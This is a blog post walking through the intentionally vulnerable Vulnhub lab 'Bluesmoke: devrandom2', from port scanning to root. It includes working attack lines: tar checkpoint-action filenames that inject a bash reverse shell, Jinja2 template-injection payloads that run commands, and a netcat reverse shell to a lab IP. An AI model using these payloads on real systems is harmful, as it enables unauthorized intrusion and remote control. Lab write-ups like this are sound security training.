Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub Bluesmoke: devrandom2 Walkthrough


https://www.vulnhub.com/entry/bluesmoke-devrandom2,678/


Nmap scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100

图片.png


Check port 80, it's a backup system.

图片.png



We can only upload .zip or .tar files. And tar has wildcrad vulnerability.  We create 3 files and pack them in a tar file.

echo '' > --checkpoint=1
echo '' > '--checkpoint-action=exec=sh p.sh'
echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.150/1234 0>&1'" > p.sh
tar -cvf p.tar ./--checkpoint=1 ./--checkpoint-action=exec=sh\ p.sh ./p.sh


Then we upload p.tar, and listen as port 1234. About 1 minute later, we get reverse shell.

图片.png


Then we can upload id_rsa.pub and get ssh login.

Upload pspy64 and run, wait longer.

We found 'grep -q 1 /tmp/start', looks like a signal.

图片.png



Create a file named "start" in /tmp, with content "1". Then run pspy64 again. Wait and wait.

echo 1 > /tmp/start

图片.png


A new service is running. Let's check port again, a new port is open at port 8787.

图片.png


Port forword 8787 with ssh. Check service.

ssh -L 8787:127.0.0.1:8787 backupper@192.168.56.98

图片.png


Use wfuzz to check if the site has some variables.

wfuzz -u 'http://127.0.0.1:8787/?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 21

图片.png


The value of "name" will be displayed.

图片.png


And it has SSTI vulnerability.

图片.png


Let's check a longer SSTI code.

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

图片.png


Now we can get reverse shell as remnie.

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').system('nc 192.168.56.150 2234 -e /bin/bash')") }}{% endif %}{% endfor %}

图片.png


Then in /home/remnie/scripts, find a strange server.conf.

图片.png


Copy the encrypted content into CyberChef and select:

Form Hexdump --> Find/Replace (space to '') -->From Binary --> From Hex --> From Base32 --> From Base64

Then we get root credentials.

图片.png


Finally we got root.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0